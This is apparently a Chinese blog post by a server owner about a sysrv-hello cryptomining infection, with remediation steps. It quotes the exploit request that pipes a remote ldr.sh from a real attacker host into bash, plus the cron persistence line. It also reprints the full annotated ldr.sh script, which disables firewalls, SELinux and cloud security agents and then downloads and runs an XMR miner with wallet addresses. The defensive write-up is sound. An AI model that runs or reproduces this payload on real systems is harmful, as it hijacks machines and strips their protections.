先描述下我的问题。
阿里云一直短信加邮件提示“...服务器因被攻击限制访问部分IP及端口...”
看图:
方便复制搜索
Web应用威胁检测-疑似成功的Web攻击已手工处理高级威胁检测模型
备注
该告警由如下引擎检测发现:
请求时间: 2021-01-19 06:05:22
攻击者IP: 34.66.235.248
Host: ---------:8081
URI: /service/extdirect
Content_type: application/json;charset=utf-8
POST_DATA: {"action":"coreui_Task","method":"create","data":[{"id":"","typeId":"script","enabled":true,"name":"t","alertEmail":"","schedule":"manual","properties":{"language":"groovy","source":"['bash','-c','(curl -fsSL http://185.239.242.71/ldr.sh || wget -q -O - http://185.239.242.71/ldr.sh) | bash'].execute()"},"recurringDays":[],"startDate":null}],"type":"rpc","tid":99}
解决方案: 云安全中心检测到网络流量中疑似存在攻击的行为,同时在某台主机上发生了相似的命令执行或网络连接行为,推断该行为有可能是成功的Web攻击事件。请关注这是我后来发现的,一般是这样的
主要是下载的文件:http://185.239.242.71/ldr.sh,可网页查看
搜索了解了一下,是最新的挖矿病毒。阿里云叫sysrv-hello,我这个像是更新版。
主要是network01和sysrv
解决办法:
- 进制攻击者ip的通信。34.66.235.248、185.239.242.71
- 删除ldr.sh 添加的定时任务,主要是 /etc/crontab 文件里的内容和 /etc/spool/cron 文件夹下的文件。例如我的是 /etc/spool/cron/root 文件里有
*/9 * * * * (curl -fsSL http://185.239.242.71/ldr.sh || wget -q -O - http://185.239.242.71/ldr.sh) | bash > /dev/null 2>&1- 修复防护程序:AliYunDun等,修复AliYunDun如下,不一定可用可使者查找下图官方安装教程
wget "https://update3.aegis.aliyun.com/download/install/2.0/linux/AliAqsInstall_64.sh" && chmod +x AliAqsInstall_64.sh && ./AliAqsInstall_64.sh 0WL014https://yundunnext.console.aliyun.com/?p=sasnext#/setting/install/cn-hangzhou
还有一些命令我就不详细解释了,大家都懂,请了解后执行以下命令
if [ ulimit -a -eq 1024 ] then
ulimit -n 1024
fi
# watchdog
sysctl kernel.nmi_watchdog=1
echo '1' >/proc/sys/kernel/nmi_watchdog
# vi /etc/sysctl.conf
# 删除所有 kernel.nmi_watchdog=0
# 命令未测试,我手工删除的
sed -i '/kernel.nmi_watchdog=0/d' /etc/sysctl.conf
# 开启 setenforce
setenforce 1
echo SELINUX=enforcing >/etc/selinux/config
rm -f /etc/spool/cron/*
# 安装 aliyun服务后执行
systemctl start aliyun.service
systemctl enable aliyun.service可能不是很全,见谅。
ldr.sh 我的笔记,拿走不谢
#!/bin/bash
cc=http://185.239.242.71
xmr=network01
sys=sysrv
get() {
echo downloading $1
chattr -i $2; rm -rf $2
curl -fsSL $1 > $2 || wget -q -O - $1 > $2 || php -r "file_put_contents('$2', file_get_contents('$1'));"
chmod +x $2
}
clean_system() {
# 每个进程可打开的文件数,缺省值是 1024
ulimit -n 65535
# 修改文件属性 # 未改变什么
chattr -iua /tmp/
chattr -iua /var/tmp/
# 定时任务目录
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
# 关闭netfilter防火墙 无
ufw disable
# 清除规则链中的现有条目。不改变规则链的默认目标策略
iptables -F
# 禁用watchdog
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
# 删除
rm -rf /var/log/syslog /tmp/* /usr/local/aegis
# remove aliyun yunjing
if ps aux | grep -i '[a]liyun'; then
# 卸载 aliyun.service
curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
# 无 bcm-agent
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
# 关闭 setenforce
systemctl stop c3pool_miner.service
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
# 关闭 apparmor
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
# remove docker xmr image
a='pocosow gakeaws azulu auto xmr mine monero slowhttp bash.shell entrypoint.sh /var/sbin/bash'
for i in $a; do
docker ps | grep $i | awk '{print $1}' | xargs -I % docker kill %
done
a='pocosow gakeaws azulu auto xmr mine monero slowhttp buster-slim hello- registry'
for i in $a; do
docker images -a | grep $i | awk '{print $3}' | xargs -I % docker rmi -f %
done
}
clean_system
# kill high cpu usage proc
ps axf -o "pid %cpu" | awk '{if($2>=50.0) print $1}' | while read pid; do
cat /proc/$pid/cmdline | grep -a -E "$sys|$xmr"
if [ $? -ne 0 ]; then
kill -9 $pid
fi
done
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# setup xmr
sysctl -w vm.nr_hugepages=`nproc --all`
ps -fe | grep $xmr | grep -v grep
if [ $? -ne 0 ]; then
# write config.json for xmrig
chattr -i config.json
rm -rf config.json
echo '{
"autosave": false,
"watch": false,
"donate-level": 0,
"pools": [
{"url": "pool.minexmr.com:5555", "user": "49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa.linux"},
{"url": "xmr.f2pool.com:13531", "user": "49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa.linux", "pass": "x"}
]
}' > config.json
if [ $(getconf LONG_BIT) = 64 ]; then
# get 上面的下载函数
get $cc/xmr64 $xmr
else
get $cc/xmr32 $xmr
fi
nohup ./$xmr 1>/dev/null 2>&1 &
fi
# setup sys
ps -fe | grep $sys | grep -v grep
if [ $? -ne 0 ]; then
get $cc/sysrv $sys
nohup ./$sys 1>/dev/null 2>&1 &
fi
# 清除定时任务
crontab -r
echo "*/5 * * * * (curl -fsSL $cc/ldr.sh || wget -q -O - $cc/ldr.sh) | bash > /dev/null 2>&1" | crontab -
# 实际内容:*/9 * * * * (curl -fsSL http://185.239.242.71/ldr.sh || wget -q -O - http://185.239.242.71/ldr.sh) | bash > /dev/null 2>&1
sleep 3; rm -rf $sys config.json $xmr
记得点赞,评论哦,谢谢
有问题我会积极回复的。
780
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
